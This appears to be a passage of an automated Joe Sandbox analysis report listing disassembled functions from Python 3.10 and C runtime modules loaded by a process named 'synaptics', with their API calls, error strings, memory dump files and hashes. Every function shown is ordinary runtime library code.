                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A11E9B6A001157A9B11AA56AD41CEB37AC9A6119FB440035FC0CE3F00F726ED2883F1
                                                                                                                                                                                                      Function 6C4B19D0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 331COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(000000FF), ref: 6C4B1A83
                                                                                                                                                                                                      • PyNumber_Add.PYTHON310(?,00000000), ref: 6C4B1A95
                                                                                                                                                                                                      • PyNumber_Add.PYTHON310(00000000,?), ref: 6C4B1B68
                                                                                                                                                                                                      • PyObject_RichCompareBool.PYTHON310(00000000,?,00000000), ref: 6C4B1B9F
                                                                                                                                                                                                        • Part of subcall function 6C4B1920: _PyNumber_Index.PYTHON310(?), ref: 6C4B193E
                                                                                                                                                                                                        • Part of subcall function 6C4B1920: _PyLong_Copy.PYTHON310(00000000), ref: 6C4B1958
                                                                                                                                                                                                      • PyObject_RichCompareBool.PYTHON310(00000000,?,00000004), ref: 6C4B1BD2
                                                                                                                                                                                                      • PyNumber_Add.PYTHON310(00000000,?), ref: 6C4B1C45
                                                                                                                                                                                                      • PyObject_RichCompareBool.PYTHON310(00000000,?,00000000), ref: 6C4B1C74
                                                                                                                                                                                                      • PyObject_RichCompareBool.PYTHON310(00000000,?,00000004), ref: 6C4B1CA5
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000,00000000,00000000,00000000), ref: 6C4B1D36
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • slice step cannot be zero, xrefs: 6C4B1D1F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BoolCompareNumber_Object_Rich$Long_$CopyErr_FromIndexLongObject
                                                                                                                                                                                                      • String ID: slice step cannot be zero
                                                                                                                                                                                                      • API String ID: 1070211306-2914740136
                                                                                                                                                                                                      • Opcode ID: 00e4c371313773dc18ebb739cc9b5f125735d7cf8160b7daac8e262f442c3a53
                                                                                                                                                                                                      • Instruction ID: 23797f64f1192d3df42ac41a9e740bd9837301d2668519256d080e4846d39612
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00e4c371313773dc18ebb739cc9b5f125735d7cf8160b7daac8e262f442c3a53
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6C1A2B5A052019FD704CF69D880E5A77F4AF85339F14426CE969ABBE1D731EC02CBA1
                                                                                                                                                                                                      Function 6C58FAD0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 174threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(?,000000FF,000000FF,00000000), ref: 6C58FB38
                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON310(?), ref: 6C58FB7E
                                                                                                                                                                                                      • PyTuple_Pack.PYTHON310(00000003,6C7420B8,6C7420B8,6C7420B8), ref: 6C58FBBB
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,00000000), ref: 6C58FBD3
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58FC38
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C58FC57
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C58FC5E
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(_PyThread_CurrentExceptions), ref: 6C58FCA5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • _PyThread_CurrentExceptions, xrefs: 6C58FCA0
                                                                                                                                                                                                      • sys._current_exceptions, xrefs: 6C58FAEC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$Dict_EnterError_FatalFromItemLeaveLongLong_PackReleaseSemaphoreThread_acquire_lock_timedTstateTuple_Unsigned
                                                                                                                                                                                                      • String ID: _PyThread_CurrentExceptions$sys._current_exceptions
                                                                                                                                                                                                      • API String ID: 1369751958-3043169471
                                                                                                                                                                                                      • Opcode ID: 77ba86d5f99e6bf07caaa9515278ed468f2bda6fa77271f916686e78a04cc353
                                                                                                                                                                                                      • Instruction ID: cfbd1e2f42c4e0ff0870eff2917bafdbdd6566986d90fc777e83263107bf8aed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77ba86d5f99e6bf07caaa9515278ed468f2bda6fa77271f916686e78a04cc353
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F251DF716066128BD720DE69CC90A1677E4EF897A8F14472CEC65DBBA0D730ED06CB92
                                                                                                                                                                                                      Function 73A871A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 131COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 73A8720C
                                                                                                                                                                                                      • PMDtoOffset.LIBCMT ref: 73A87232
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Bad dynamic_cast!, xrefs: 73A87274
                                                                                                                                                                                                      • Bad read pointer - no RTTI data!, xrefs: 73A872DA
                                                                                                                                                                                                      • Attempted a typeid of nullptr pointer!, xrefs: 73A8730E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FindInstanceOffsetTargetType
                                                                                                                                                                                                      • String ID: Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                                                                                      • API String ID: 2363274979-2941716148
                                                                                                                                                                                                      • Opcode ID: 4d6a2d2d01a3f3c0d7b8fba712da24196cc62670f65a8b8f187a486e68537fc5
                                                                                                                                                                                                      • Instruction ID: d94ebf0859963cdfa77f5bf1c4d3721b2b20706ff92bc9dc3f3b0b7bde2944ab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d6a2d2d01a3f3c0d7b8fba712da24196cc62670f65a8b8f187a486e68537fc5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB311772A00304DFEB1BCFA8CA47FC977B4FB48220F10465BE91097698E736E9418B60
                                                                                                                                                                                                      Function 73A8A8A2 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 125COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DName::operator+.LIBCMT ref: 73A8A8D5
                                                                                                                                                                                                        • Part of subcall function 73A88185: DName::operator+=.LIBCMT ref: 73A8819B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+Name::operator+=
                                                                                                                                                                                                      • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                      • API String ID: 382699925-1464470183
                                                                                                                                                                                                      • Opcode ID: 2f769962fe1e4cd4948e172ae4d9b188d962416a7849852b1ba70f2e71994dbd
                                                                                                                                                                                                      • Instruction ID: d1c3ece59c1ac36e6a7f1279aa2bc42d1dc5fb356a13d05f5abeb8f97f216de3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f769962fe1e4cd4948e172ae4d9b188d962416a7849852b1ba70f2e71994dbd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59410971D0020A9FDB07CFA9C5827EEBBB9FB08304F14411BD546B7298DB349A85CBA0
                                                                                                                                                                                                      Function 6C5668B0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,expected a subclass of ImportError), ref: 6C5668ED
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,expected a message argument), ref: 6C566910
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$String$Object
                                                                                                                                                                                                      • String ID: expected a message argument$expected a subclass of ImportError$name$path
                                                                                                                                                                                                      • API String ID: 2901738166-1845997629
                                                                                                                                                                                                      • Opcode ID: 8818849ddade7024632953fa5712c906b81e5b98a68ee3fb06ec8b5633cf3954
                                                                                                                                                                                                      • Instruction ID: ac4fd1ba198f602fc50775074d1a98d421fd305b35449358dbc119b0edbaf51f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8818849ddade7024632953fa5712c906b81e5b98a68ee3fb06ec8b5633cf3954
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A33107B2B00205ABD7109AA6EC41D9777A8EBD5379F004239FE19C3F62EB31D91587E1
                                                                                                                                                                                                      Function 6C550DB0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 102COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyDict_Clear.PYTHON310(?), ref: 6C550E05
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,000002E2), ref: 6C550E34
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyInterpreterState_Get), ref: 6C550E60
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(PyInterpreterState_Get,no current interpreter,PyInterpreterState_Get), ref: 6C550E6F
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation), ref: 6C550E9F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C550E28
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C550E93
                                                                                                                                                                                                      • PyInterpreterState_Get, xrefs: 6C550E5B, 6C550E6A
                                                                                                                                                                                                      • no current interpreter, xrefs: 6C550E65
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C550E23
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Fatal$ClearDict_ErrorError_FormatFuncStringTstate
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c$PyInterpreterState_Get$bad argument type for built-in operation$no current interpreter
                                                                                                                                                                                                      • API String ID: 3392856671-3440905781
                                                                                                                                                                                                      • Opcode ID: ae0dfe113fbc7483e5ad4bdd151f484c65da400dd2698f037bfc413d774160f5
                                                                                                                                                                                                      • Instruction ID: 0e1abe1f4116efd31e3ffa1f26adce602afd41ad2e08a08a5eda3c8ecc677c60
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae0dfe113fbc7483e5ad4bdd151f484c65da400dd2698f037bfc413d774160f5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E214572701249AFDA109A5CEC80F96B3A9ABC062DB544637ED1C97E00DB30F82483E1
                                                                                                                                                                                                      Function 6C568E40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetACP.KERNEL32 ref: 6C568E66
                                                                                                                                                                                                      • _PyMem_RawWcsdup.PYTHON310(?), ref: 6C568E8D
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C4C8,00000000), ref: 6C568EAE
                                                                                                                                                                                                      • PyUnicode_FromWideChar.PYTHON310(00000000,000000FF), ref: 6C568ECC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharErr_FromMem_ObjectUnicode_WcsdupWide
                                                                                                                                                                                                      • String ID: @bJl$Out of memory and PyExc_MemoryError is not initialized yet$UTF-8$_PyErr_NoMemory$cp%u
                                                                                                                                                                                                      • API String ID: 2053800516-2453813352
                                                                                                                                                                                                      • Opcode ID: 1d936cdd1d6ef167cd78a8e23742d2bc28cf0655edacdd33d1df93f7fe544f91
                                                                                                                                                                                                      • Instruction ID: d1176468d4dc7b0086cbc61e7bdc23139e78987d427dc9f347a5ebf3516c0c83
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d936cdd1d6ef167cd78a8e23742d2bc28cf0655edacdd33d1df93f7fe544f91
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD11D6717141009BC610B7689D05A9B77B8DBC6619F504A2AF918C7B91EB21DC1487A3
                                                                                                                                                                                                      Function 6C57BE20 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 79COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 6C57BDB0: PyUnicode_FromString.PYTHON310(_config_init,_config_init,?,?,6C57BE32,?,?), ref: 6C57BDB8
                                                                                                                                                                                                        • Part of subcall function 6C57BDB0: PyErr_Format.PYTHON310(missing config key: %s,_config_init), ref: 6C57BE02
                                                                                                                                                                                                      • PyLong_AsLongAndOverflow.PYTHON310(00000000,?,?,?), ref: 6C57BE40
                                                                                                                                                                                                        • Part of subcall function 6C491EA0: _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\longobject.c,00000182,00000000), ref: 6C491ED9
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,Python int too large to convert to C int), ref: 6C57BE7C
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(00000000,6C73BFE8), ref: 6C57BEA1
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(invalid config type: %s,_config_init), ref: 6C57BEB9
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(?,6C73BD78), ref: 6C57BED9
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(invalid config value: %s,_config_init), ref: 6C57BEF1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ExceptionGivenMatchesString$FromLongLong_OverflowUnicode_
                                                                                                                                                                                                      • String ID: Python int too large to convert to C int$_config_init$invalid config type: %s$invalid config value: %s
                                                                                                                                                                                                      • API String ID: 4252891224-2829320781
                                                                                                                                                                                                      • Opcode ID: 5072a3f76fee0bb2625b7bb23e8c3c6b85b287d8764cca585280a22e6500f42e
                                                                                                                                                                                                      • Instruction ID: 4bf3adca00c0d7a7314c7e088903f1f9722db246b1977deb8c3d442d2ae536ce
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5072a3f76fee0bb2625b7bb23e8c3c6b85b287d8764cca585280a22e6500f42e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6121C972B011049FCB10AA3AED0699A37A9DBD123EF504675FD2882FE0EF219854C6F1
                                                                                                                                                                                                      Function 6C4A1EE0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyObject_IsFreed.PYTHON310(?), ref: 6C4A1EE8
                                                                                                                                                                                                      • _PyType_CheckConsistency.PYTHON310(?), ref: 6C4A1EFC
                                                                                                                                                                                                        • Part of subcall function 6C4B52F0: _PyObject_IsFreed.PYTHON310(6C4A1F01,?,?,6C4A1F01,?), ref: 6C4B52F8
                                                                                                                                                                                                        • Part of subcall function 6C4B52F0: _PyUnicode_FromId.PYTHON310(6C74C848), ref: 6C4B5356
                                                                                                                                                                                                        • Part of subcall function 6C4B52F0: PyDict_Contains.PYTHON310(74C08508,00000000,?,?), ref: 6C4B5368
                                                                                                                                                                                                      • _PyUnicode_CheckConsistency.PYTHON310(?,?), ref: 6C4A1F15
                                                                                                                                                                                                      • _PyDict_CheckConsistency.PYTHON310(?,?), ref: 6C4A1F30
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,!_PyObject_IsFreed(op),D:\a\1\s\Objects\object.c,0000002A,_PyObject_CheckConsistency), ref: 6C4A1F54
                                                                                                                                                                                                      • _PyObject_AssertFailed.PYTHON310(?,00000000,_Py_REFCNT(((const PyObject*)(op))) >= 1,D:\a\1\s\Objects\object.c,0000002B,_PyObject_CheckConsistency,?,00000000,!_PyObject_IsFreed(op),D:\a\1\s\Objects\object.c,0000002A,_PyObject_CheckConsistency), ref: 6C4A1F6D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
